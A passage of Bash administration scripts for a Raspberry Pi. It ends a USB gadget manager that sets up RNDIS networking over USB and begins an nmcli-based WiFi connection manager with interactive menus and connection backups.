echo "dtoverlay=dwc2" | sudo tee -a /boot/firmware/config.txt
check_success "Appended dtoverlay=dwc2 to /boot/firmware/config.txt"
else
log "INFO" "dtoverlay=dwc2 already present in /boot/firmware/config.txt"
fi
# Create USB gadget script
if [ ! -f /usr/local/bin/usb-gadget.sh ]; then
log "INFO" "Creating USB gadget script at /usr/local/bin/usb-gadget.sh"
cat > /usr/local/bin/usb-gadget.sh << 'EOF'
#!/bin/bash
set -e
# Enable debug mode for detailed logging
set -x
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: RNDIS Network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/rndis.usb0
# Remove existing symlink if it exists to prevent duplicates
if [ -L configs/c.1/rndis.usb0 ]; then
rm configs/c.1/rndis.usb0
fi
ln -s functions/rndis.usb0 configs/c.1/
# Wait for a USB Device Controller (UDC) to become available, then bind the gadget to it.
# The previous approach redirected 'ls' output into UDC and then wrote the name a second
# time, which fails with "Device or resource busy" once the gadget is already bound.
max_retries=10
retry_count=0
while true; do
UDC_NAME=$(ls /sys/class/udc 2>/dev/null | head -n 1)
if [ -n "$UDC_NAME" ] && echo "$UDC_NAME" > UDC 2>/dev/null; then
break
fi
if [ $retry_count -ge $max_retries ]; then
echo "Error: no usable UDC (device busy or absent) after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
echo "Assigned UDC: $UDC_NAME"
# Check if the usb0 interface is already configured
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ip addr add 172.20.2.1/24 dev usb0
ip link set usb0 up
echo "Configured usb0 with IP 172.20.2.1"
else
echo "Interface usb0 already configured."
fi
EOF
chmod +x /usr/local/bin/usb-gadget.sh
check_success "Created and made USB gadget script executable at /usr/local/bin/usb-gadget.sh"
else
log "INFO" "USB gadget script /usr/local/bin/usb-gadget.sh already exists. Skipping creation."
fi
# Create USB gadget service
if [ ! -f /etc/systemd/system/usb-gadget.service ]; then
log "INFO" "Creating USB gadget systemd service at /etc/systemd/system/usb-gadget.service"
cat > /etc/systemd/system/usb-gadget.service << EOF
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
EOF
check_success "Created USB gadget systemd service at /etc/systemd/system/usb-gadget.service"
else
log "INFO" "USB gadget systemd service /etc/systemd/system/usb-gadget.service already exists. Skipping creation."
fi
# Configure network interface: Remove duplicate entries first
log "INFO" "Cleaning up existing network interface configurations for usb0 in /etc/network/interfaces"
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
# Remove all lines starting with allow-hotplug usb0 and the following lines (iface and settings)
sudo sed -i '/^allow-hotplug usb0$/,/^$/d' /etc/network/interfaces
check_success "Removed existing network interface configurations for usb0 from /etc/network/interfaces"
else
log "INFO" "No existing network interface configuration for usb0 found in /etc/network/interfaces."
fi
# Append network interface configuration for usb0 if not already present
if ! grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
log "INFO" "Appending network interface configuration for usb0 to /etc/network/interfaces"
cat >> /etc/network/interfaces << EOF
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
gateway 172.20.2.1
EOF
check_success "Appended network interface configuration for usb0 to /etc/network/interfaces"
else
log "INFO" "Network interface usb0 already configured in /etc/network/interfaces"
fi
# Reload systemd daemon and enable/start services
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload
check_success "Reloaded systemd daemon"
log "INFO" "Enabling systemd-networkd service"
systemctl enable systemd-networkd
check_success "Enabled systemd-networkd service"
log "INFO" "Enabling usb-gadget service"
systemctl enable usb-gadget.service
check_success "Enabled usb-gadget service"
log "INFO" "Starting systemd-networkd service"
systemctl start systemd-networkd
check_success "Started systemd-networkd service"
log "INFO" "Starting usb-gadget service"
systemctl start usb-gadget.service
check_success "Started usb-gadget service"
log "SUCCESS" "USB Gadget installation completed successfully."
}
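The UDC binding inside usb-gadget.sh relies on a bounded retry loop. The pattern in isolation, with a stand-in `attempt` function (hypothetical, succeeding on the third try) replacing the real sysfs write:

```shell
max_retries=10
retry_count=0
# Stand-in for the real bind attempt (echo "$UDC_NAME" > UDC): fails twice, then succeeds.
attempt() { [ "$retry_count" -ge 2 ]; }
until attempt; do
    if [ "$retry_count" -ge "$max_retries" ]; then
        echo "Error: Device or resource busy after $max_retries attempts." >&2
        exit 1
    fi
    retry_count=$((retry_count + 1))
    sleep 1   # give the controller time to settle before retrying
done
echo "bound after $retry_count retries"
```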
# ============================================================
# Function to Uninstall USB Gadget
# ============================================================
uninstall_usb_gadget() {
log "INFO" "Starting USB Gadget uninstallation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Stop and disable USB gadget service
if systemctl is-active --quiet usb-gadget.service; then
systemctl stop usb-gadget.service
check_success "Stopped usb-gadget.service"
else
log "INFO" "usb-gadget.service is not running."
fi
if systemctl is-enabled --quiet usb-gadget.service; then
systemctl disable usb-gadget.service
check_success "Disabled usb-gadget.service"
else
log "INFO" "usb-gadget.service is not enabled."
fi
# Remove USB gadget service file
if [ -f /etc/systemd/system/usb-gadget.service ]; then
rm /etc/systemd/system/usb-gadget.service
check_success "Removed /etc/systemd/system/usb-gadget.service"
else
log "INFO" "/etc/systemd/system/usb-gadget.service does not exist. Skipping removal."
fi
# Remove USB gadget script
if [ -f /usr/local/bin/usb-gadget.sh ]; then
rm /usr/local/bin/usb-gadget.sh
check_success "Removed /usr/local/bin/usb-gadget.sh"
else
log "INFO" "/usr/local/bin/usb-gadget.sh does not exist. Skipping removal."
fi
# Restore cmdline.txt and config.txt from backups
if [ -f /boot/firmware/cmdline.txt.bak ]; then
cp /boot/firmware/cmdline.txt.bak /boot/firmware/cmdline.txt
chmod 644 /boot/firmware/cmdline.txt
check_success "Restored /boot/firmware/cmdline.txt from backup"
else
log "WARNING" "Backup /boot/firmware/cmdline.txt.bak not found. Skipping restoration."
fi
if [ -f /boot/firmware/config.txt.bak ]; then
cp /boot/firmware/config.txt.bak /boot/firmware/config.txt
check_success "Restored /boot/firmware/config.txt from backup"
else
log "WARNING" "Backup /boot/firmware/config.txt.bak not found. Skipping restoration."
fi
# Remove network interface configuration for usb0: Remove all related lines
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
log "INFO" "Removing network interface configuration for usb0 from /etc/network/interfaces"
# Remove lines from allow-hotplug usb0 up to the next empty line
sudo sed -i '/^allow-hotplug usb0$/,/^$/d' /etc/network/interfaces
check_success "Removed network interface configuration for usb0 from /etc/network/interfaces"
else
log "INFO" "Network interface usb0 not found in /etc/network/interfaces. Skipping removal."
fi
# Reload systemd daemon
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload
check_success "Reloaded systemd daemon"
# Disable and stop systemd-networkd service
if systemctl is-active --quiet systemd-networkd; then
systemctl stop systemd-networkd
check_success "Stopped systemd-networkd service"
else
log "INFO" "systemd-networkd service is not running."
fi
if systemctl is-enabled --quiet systemd-networkd; then
systemctl disable systemd-networkd
check_success "Disabled systemd-networkd service"
else
log "INFO" "systemd-networkd service is not enabled."
fi
# Clean up any remaining duplicate entries in cmdline.txt and config.txt
log "INFO" "Ensuring no duplicate entries remain in configuration files."
# Remove any remaining modules-load=dwc2,g_rndis and modules-load=dwc2,g_ether
sudo sed -i '/modules-load=dwc2,g_rndis/d' /boot/firmware/cmdline.txt
sudo sed -i '/modules-load=dwc2,g_ether/d' /boot/firmware/cmdline.txt
# Remove any remaining dtoverlay=dwc2
sudo sed -i '/^dtoverlay=dwc2$/d' /boot/firmware/config.txt
log "INFO" "Cleaned up duplicate entries in /boot/firmware/cmdline.txt and /boot/firmware/config.txt"
log "SUCCESS" "USB Gadget uninstallation completed successfully."
}
# ============================================================
# Function to List USB Gadget Information
# ============================================================
list_usb_gadget_info() {
echo -e "${CYAN}===== USB Gadget Information =====${NC}"
# Check status of usb-gadget service
echo -e "\n${YELLOW}Service Status:${NC}"
if systemctl list-units --type=service | grep -q usb-gadget.service; then
systemctl status usb-gadget.service --no-pager
else
echo -e "${RED}usb-gadget.service is not installed.${NC}"
fi
# Check if USB gadget script exists
echo -e "\n${YELLOW}USB Gadget Script:${NC}"
if [ -f /usr/local/bin/usb-gadget.sh ]; then
echo -e "${GREEN}/usr/local/bin/usb-gadget.sh exists.${NC}"
else
echo -e "${RED}/usr/local/bin/usb-gadget.sh does not exist.${NC}"
fi
# Check network interface configuration
echo -e "\n${YELLOW}Network Interface Configuration for usb0:${NC}"
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
grep "^allow-hotplug usb0" /etc/network/interfaces -A 4
else
echo -e "${RED}No network interface configuration found for usb0.${NC}"
fi
# Check cmdline.txt
echo -e "\n${YELLOW}/boot/firmware/cmdline.txt:${NC}"
if grep -q "modules-load=dwc2,g_rndis" /boot/firmware/cmdline.txt && grep -q "modules-load=dwc2,g_ether" /boot/firmware/cmdline.txt; then
echo -e "${GREEN}modules-load=dwc2,g_rndis and modules-load=dwc2,g_ether are present.${NC}"
else
echo -e "${RED}modules-load=dwc2,g_rndis and/or modules-load=dwc2,g_ether are not present.${NC}"
fi
# Check config.txt
echo -e "\n${YELLOW}/boot/firmware/config.txt:${NC}"
if grep -q "^dtoverlay=dwc2" /boot/firmware/config.txt; then
echo -e "${GREEN}dtoverlay=dwc2 is present.${NC}"
else
echo -e "${RED}dtoverlay=dwc2 is not present.${NC}"
fi
# Check if systemd-networkd is enabled
echo -e "\n${YELLOW}systemd-networkd Service:${NC}"
if systemctl is-enabled --quiet systemd-networkd; then
systemctl is-active systemd-networkd && echo -e "${GREEN}systemd-networkd is active.${NC}" || echo -e "${RED}systemd-networkd is inactive.${NC}"
else
echo -e "${RED}systemd-networkd is not enabled.${NC}"
fi
echo -e "\n===== End of Information ====="
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ USB Gadget Manager Menu by Infinition ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. Install USB Gadget ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Uninstall USB Gadget ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. List USB Gadget Information ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Show Help ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure you run this script as root."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-5): ${NC}"
read choice
case $choice in
1)
install_usb_gadget
echo ""
read -p "Press Enter to return to the menu..."
;;
2)
uninstall_usb_gadget
echo ""
read -p "Press Enter to return to the menu..."
;;
3)
list_usb_gadget_info
echo ""
read -p "Press Enter to return to the menu..."
;;
4)
show_usage
;;
5)
log "INFO" "Exiting USB Gadget Manager. Goodbye!"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-5."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts ":fulh" opt; do
case $opt in
f)
install_usb_gadget
exit 0
;;
u)
uninstall_usb_gadget
exit 0
;;
l)
list_usb_gadget_info
exit 0
;;
h)
show_usage
;;
\?)
echo -e "${RED}Invalid option: -$OPTARG${NC}" >&2
show_usage
;;
esac
done
# ============================================================
# Main Execution
# ============================================================
# If no arguments are provided, display the menu
if [ $OPTIND -eq 1 ]; then
display_main_menu
fi

bjorn_wifi.sh (new file, 786 lines):
#!/bin/bash
# WiFi Manager Script Using nmcli
# Author: Infinition
# Version: 1.6
# Description: This script provides a simple menu interface to manage WiFi connections using nmcli.
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
PURPLE='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
shift
case $level in
"INFO") echo -e "${GREEN}[INFO]${NC} $*" ;;
"WARN") echo -e "${YELLOW}[WARN]${NC} $*" ;;
"ERROR") echo -e "${RED}[ERROR]${NC} $*" ;;
"DEBUG") echo -e "${BLUE}[DEBUG]${NC} $*" ;;
esac
}
# ============================================================
# Check if Script is Run as Root
# ============================================================
if [ "$EUID" -ne 0 ]; then
log "ERROR" "This script must be run as root."
exit 1
fi
# ============================================================
# Function to Show Usage
# ============================================================
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e " ${BLUE}-f${NC} Force refresh of WiFi connections"
echo -e " ${BLUE}-c${NC} Clear all saved WiFi connections"
echo -e " ${BLUE}-l${NC} List all available WiFi networks"
echo -e " ${BLUE}-s${NC} Show current WiFi status"
echo -e " ${BLUE}-a${NC} Add a new WiFi connection"
echo -e " ${BLUE}-d${NC} Delete a WiFi connection"
echo -e " ${BLUE}-m${NC} Manage WiFi Connections"
echo -e ""
echo -e "Example: $0 -a"
exit 1
}
# ============================================================
# Function to Check Prerequisites
# ============================================================
check_prerequisites() {
log "INFO" "Checking prerequisites..."
local missing_packages=()
# Check if nmcli is installed
if ! command -v nmcli &> /dev/null; then
missing_packages+=("network-manager")
fi
# Check if NetworkManager service is running
if ! systemctl is-active --quiet NetworkManager; then
log "WARN" "NetworkManager service is not running. Attempting to start it..."
systemctl start NetworkManager
sleep 2
if ! systemctl is-active --quiet NetworkManager; then
log "ERROR" "Failed to start NetworkManager. Please install and start it manually."
exit 1
else
log "INFO" "NetworkManager started successfully."
fi
fi
# Install missing packages if any
if [ ${#missing_packages[@]} -gt 0 ]; then
log "WARN" "Missing packages: ${missing_packages[*]}"
log "INFO" "Attempting to install missing packages..."
apt-get update
apt-get install -y "${missing_packages[@]}"
# Verify installation
for package in "${missing_packages[@]}"; do
if ! dpkg -l | grep -q "^ii.*$package"; then
log "ERROR" "Failed to install $package."
exit 1
fi
done
fi
log "INFO" "All prerequisites are met."
}
# ============================================================
# Function to Handle preconfigured.nmconnection
# ============================================================
handle_preconfigured_connection() {
preconfigured_file="/etc/NetworkManager/system-connections/preconfigured.nmconnection"
if [ -f "$preconfigured_file" ]; then
echo -e "${YELLOW}A preconfigured WiFi connection exists (preconfigured.nmconnection).${NC}"
echo -n -e "${GREEN}Do you want to delete it and recreate connections with individual SSIDs? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
# Extract SSID from preconfigured.nmconnection
ssid=$(grep "^ssid=" "$preconfigured_file" | cut -d'=' -f2 | tr -d '"')
if [ -z "$ssid" ]; then
log "WARN" "SSID not found in preconfigured.nmconnection. Cannot recreate connection."
else
# Extract security type
security=$(grep "^security=" "$preconfigured_file" | cut -d'=' -f2 | tr -d '"')
# Delete preconfigured.nmconnection
log "INFO" "Deleting preconfigured.nmconnection..."
rm "$preconfigured_file"
systemctl restart NetworkManager
sleep 2
# Recreate the connection with SSID name
echo -n -e "${GREEN}Do you want to recreate the connection for SSID '$ssid'? (y/n): ${NC}"
read recreate_confirm
if [[ "$recreate_confirm" =~ ^[Yy]$ ]]; then
# Check if connection already exists
if nmcli connection show "$ssid" &> /dev/null; then
log "WARN" "A connection named '$ssid' already exists."
else
# Prompt for password if necessary
if [ "$security" == "none" ] || [ "$security" == "--" ] || [ -z "$security" ]; then
# Open network
log "INFO" "Creating open connection for SSID '$ssid'..."
nmcli device wifi connect "$ssid" name "$ssid"
else
# Secured network
echo -n -e "${GREEN}Enter WiFi Password for '$ssid': ${NC}"
read -s password
echo ""
if [ -z "$password" ]; then
log "ERROR" "Password cannot be empty."
else
log "INFO" "Creating secured connection for SSID '$ssid'..."
nmcli device wifi connect "$ssid" password "$password" name "$ssid"
fi
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully recreated connection for '$ssid'."
else
log "ERROR" "Failed to recreate connection for '$ssid'."
fi
fi
else
log "INFO" "Connection recreation cancelled."
fi
fi
else
log "INFO" "Preconfigured connection retained."
fi
fi
}
# ============================================================
# Function to List All Available WiFi Networks and Connect
# ============================================================
list_wifi_and_connect() {
log "INFO" "Scanning for available WiFi networks..."
nmcli device wifi rescan
sleep 2
while true; do
clear
available_networks=$(nmcli -t -f SSID,SECURITY device wifi list)
if [ -z "$available_networks" ]; then
log "WARN" "No WiFi networks found."
echo ""
else
# Remove lines with empty SSIDs (hidden networks)
network_list=$(echo "$available_networks" | grep -v '^:$')
if [ -z "$network_list" ]; then
log "WARN" "No visible WiFi networks found."
echo ""
else
echo -e "${CYAN}Available WiFi Networks:${NC}"
declare -A SSIDs
declare -A SECURITIES
index=1
while IFS=: read -r ssid security; do
# Handle hidden SSIDs
if [ -z "$ssid" ]; then
ssid="<Hidden SSID>"
fi
SSIDs["$index"]="$ssid"
SECURITIES["$index"]="$security"
printf "%d. %-40s (%s)\n" "$index" "$ssid" "$security"
index=$((index + 1))
done <<< "$network_list"
fi
fi
echo ""
echo -e "${YELLOW}The list refreshes every 5 seconds. Enter a network number to connect, 'c' to be prompted for one, or 'q' to quit.${NC}"
echo -n -e "${GREEN}Enter choice (number/c/q): ${NC}"
read -t 5 input
if [ $? -eq 0 ]; then
if [[ "$input" =~ ^[Qq]$ ]]; then
log "INFO" "Exiting WiFi list."
return
elif [[ "$input" =~ ^[Cc]$ ]] || [[ "$input" =~ ^[0-9]+$ ]]; then
# Resolve the selection: 'c' prompts for a number, a number is used directly
if [[ "$input" =~ ^[Cc]$ ]]; then
echo ""
echo -n -e "${GREEN}Enter the number of the network to connect: ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
continue
fi
else
selection="$input"
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
continue
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
continue
fi
ssid_selected="${SSIDs[$selection]}"
security_selected="${SECURITIES[$selection]}"
echo -n -e "${GREEN}Do you want to connect to '$ssid_selected'? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
if [ "$security_selected" == "--" ] || [ -z "$security_selected" ]; then
# Open network
log "INFO" "Connecting to open network '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" name "$ssid_selected"
else
# Secured network
echo -n -e "${GREEN}Enter WiFi Password for '$ssid_selected': ${NC}"
read -s password
echo ""
if [ -z "$password" ]; then
log "ERROR" "Password cannot be empty."
sleep 2
continue
fi
log "INFO" "Connecting to '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" password "$password" name "$ssid_selected"
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully connected to '$ssid_selected'."
else
log "ERROR" "Failed to connect to '$ssid_selected'."
fi
else
log "INFO" "Operation cancelled."
fi
echo ""
read -p "Press Enter to continue..."
else
log "ERROR" "Invalid input."
sleep 2
fi
fi
done
}
# ============================================================
# Function to Show Current WiFi Status
# ============================================================
show_wifi_status() {
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Current WiFi Status ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
# Check if WiFi is enabled
wifi_enabled=$(nmcli radio wifi)
echo -e "▶ WiFi Enabled : ${wifi_enabled}"
# Show active connection
# Use the connection NAME field rather than SSID
active_conn=$(nmcli -t -f ACTIVE,NAME connection show --active | grep '^yes' | cut -d':' -f2)
if [ -n "$active_conn" ]; then
echo -e "▶ Connected to : ${GREEN}$active_conn${NC}"
else
echo -e "▶ Connected to : ${RED}Not Connected${NC}"
fi
# Show all saved connections
echo -e "\n${CYAN}Saved WiFi Connections:${NC}"
nmcli connection show | grep wifi
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Add a New WiFi Connection
# ============================================================
add_wifi_connection() {
echo -e "${CYAN}Add a New WiFi Connection${NC}"
echo -n "Enter SSID (Network Name): "
read ssid
echo -n "Enter WiFi Password (leave empty for open network): "
read -s password
echo ""
if [ -z "$ssid" ]; then
log "ERROR" "SSID cannot be empty."
sleep 2
return
fi
if [ -n "$password" ]; then
log "INFO" "Adding new WiFi connection for SSID: $ssid"
nmcli device wifi connect "$ssid" password "$password" name "$ssid"
else
log "INFO" "Adding new open WiFi connection for SSID: $ssid"
nmcli device wifi connect "$ssid" name "$ssid"
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully connected to '$ssid'."
else
log "ERROR" "Failed to connect to '$ssid'."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Delete a WiFi Connection
# ============================================================
delete_wifi_connection() {
echo -e "${CYAN}Delete a WiFi Connection${NC}"
# Correctly filter connections by type '802-11-wireless'
connections=$(nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}')
if [ -z "$connections" ]; then
log "WARN" "No WiFi connections available to delete."
echo ""
read -p "Press Enter to return to the menu..."
return
fi
echo -e "${CYAN}Available WiFi Connections:${NC}"
index=1
declare -A CONNECTIONS
while IFS= read -r conn; do
echo -e "$index. $conn"
CONNECTIONS["$index"]="$conn"
index=$((index + 1))
done <<< "$connections"
echo ""
echo -n -e "${GREEN}Enter the number of the connection to delete (or press Enter to cancel): ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
sleep 1
return
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
return
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
return
fi
conn_name="${CONNECTIONS[$selection]}"
# Backup the connection before deletion
backup_dir="$HOME/wifi_connection_backups"
mkdir -p "$backup_dir"
backup_file="$backup_dir/${conn_name}.nmconnection"
if nmcli connection show "$conn_name" &> /dev/null; then
log "INFO" "Backing up connection '$conn_name'..."
cp "/etc/NetworkManager/system-connections/$conn_name.nmconnection" "$backup_file" 2>/dev/null
if [ $? -eq 0 ]; then
log "INFO" "Backup saved to '$backup_file'."
else
log "WARN" "Failed to backup connection. It might not be a preconfigured connection or backup location is inaccessible."
fi
else
log "WARN" "Connection '$conn_name' does not exist or cannot be backed up."
fi
log "INFO" "Deleting WiFi connection: $conn_name"
nmcli connection delete "$conn_name"
if [ $? -eq 0 ]; then
log "INFO" "Successfully deleted '$conn_name'."
else
log "ERROR" "Failed to delete '$conn_name'."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Clear All Saved WiFi Connections
# ============================================================
clear_all_connections() {
echo -e "${YELLOW}Are you sure you want to delete all saved WiFi connections? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
log "INFO" "Deleting all saved WiFi connections..."
connections=$(nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}')
# Iterate line by line so connection names containing spaces are handled correctly
while IFS= read -r conn; do
[ -z "$conn" ] && continue
# Backup before deletion
backup_dir="$HOME/wifi_connection_backups"
mkdir -p "$backup_dir"
backup_file="$backup_dir/${conn}.nmconnection"
if nmcli connection show "$conn" &> /dev/null; then
cp "/etc/NetworkManager/system-connections/$conn.nmconnection" "$backup_file" 2>/dev/null
if [ $? -eq 0 ]; then
log "INFO" "Backup saved to '$backup_file'."
else
log "WARN" "Failed to backup connection '$conn'."
fi
fi
nmcli connection delete "$conn"
log "INFO" "Deleted connection: $conn"
done <<< "$connections"
log "INFO" "All saved WiFi connections have been deleted."
else
log "INFO" "Operation cancelled."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Manage WiFi Connections
# ============================================================
manage_wifi_connections() {
while true; do
clear
echo -e "${CYAN}Manage WiFi Connections${NC}"
echo -e "1. List WiFi Connections"
echo -e "2. Delete a WiFi Connection"
echo -e "3. Recreate a WiFi Connection from Backup"
echo -e "4. Back to Main Menu"
echo -n -e "${GREEN}Choose an option (1-4): ${NC}"
read choice
case $choice in
1)
# List WiFi connections
clear
echo -e "${CYAN}Saved WiFi Connections:${NC}"
nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}'
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
;;
2)
delete_wifi_connection
;;
3)
# List the available backups
backup_dir="$HOME/wifi_connection_backups"
if [ ! -d "$backup_dir" ]; then
log "WARN" "No backup directory found at '$backup_dir'."
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
continue
fi
backups=("$backup_dir"/*.nmconnection)
# An unmatched glob stays literal, so test the first entry instead of the array length
if [ ! -e "${backups[0]}" ]; then
log "WARN" "No backup files found in '$backup_dir'."
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
continue
fi
echo -e "${CYAN}Available WiFi Connection Backups:${NC}"
index=1
declare -A BACKUPS
for backup in "${backups[@]}"; do
backup_name=$(basename "$backup" .nmconnection)
echo -e "$index. $backup_name"
BACKUPS["$index"]="$backup_name"
index=$((index + 1))
done
echo ""
echo -n -e "${GREEN}Enter the number of the connection to recreate (or press Enter to cancel): ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
sleep 1
continue
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
continue
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
continue
fi
conn_name="${BACKUPS[$selection]}"
backup_file="$backup_dir/${conn_name}.nmconnection"
# Verify that the backup file exists
if [ ! -f "$backup_file" ]; then
log "ERROR" "Backup file '$backup_file' does not exist."
sleep 2
continue
fi
log "INFO" "Recreating connection '$conn_name' from backup..."
cp "$backup_file" "/etc/NetworkManager/system-connections/" 2>/dev/null
if [ $? -ne 0 ]; then
log "ERROR" "Failed to copy backup file to NetworkManager directory. Check permissions."
sleep 2
continue
fi
# Set correct permissions
chmod 600 "/etc/NetworkManager/system-connections/$conn_name.nmconnection"
# Reload NetworkManager connections
nmcli connection reload
# Bring the connection up
nmcli connection up "$conn_name"
if [ $? -eq 0 ]; then
log "INFO" "Successfully recreated and connected to '$conn_name'."
else
log "ERROR" "Failed to recreate and connect to '$conn_name'."
fi
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
;;
4)
log "INFO" "Returning to Main Menu."
return
;;
*)
log "ERROR" "Invalid option."
sleep 2
;;
esac
done
}
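One bash subtlety worth noting for the backup handling above: a glob with no matches expands to itself, so an array built from it is never empty and must be checked with a file test rather than its length. A standalone demonstration:

```shell
tmpdir=$(mktemp -d)                    # empty directory: no *.nmconnection files
backups=("$tmpdir"/*.nmconnection)
echo "array length: ${#backups[@]}"    # 1, because the unmatched glob stays literal
if [ -e "${backups[0]}" ]; then
    echo "backups found"
else
    echo "no backups"
fi
rmdir "$tmpdir"
```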
# ============================================================
# Function to Force Refresh WiFi Connections
# ============================================================
force_refresh_wifi_connections() {
log "INFO" "Refreshing WiFi connections..."
nmcli connection reload
# Identify the WiFi device (e.g., wlan0, wlp2s0)
wifi_device=$(nmcli device status | awk '$2 == "wifi" {print $1; exit}')
if [ -n "$wifi_device" ]; then
nmcli device disconnect "$wifi_device"
nmcli device connect "$wifi_device"
log "INFO" "WiFi connections have been refreshed."
else
log "WARN" "No WiFi device found to refresh."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Wifi Manager Menu by Infinition ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. List Available WiFi Networks ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Show Current WiFi Status ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. Add a New WiFi Connection ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Delete a WiFi Connection ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Clear All Saved WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 6. Manage WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 7. Force Refresh WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 8. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure your WiFi adapter is enabled."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-8): ${NC}"
read choice
case $choice in
1)
list_wifi_and_connect
;;
2)
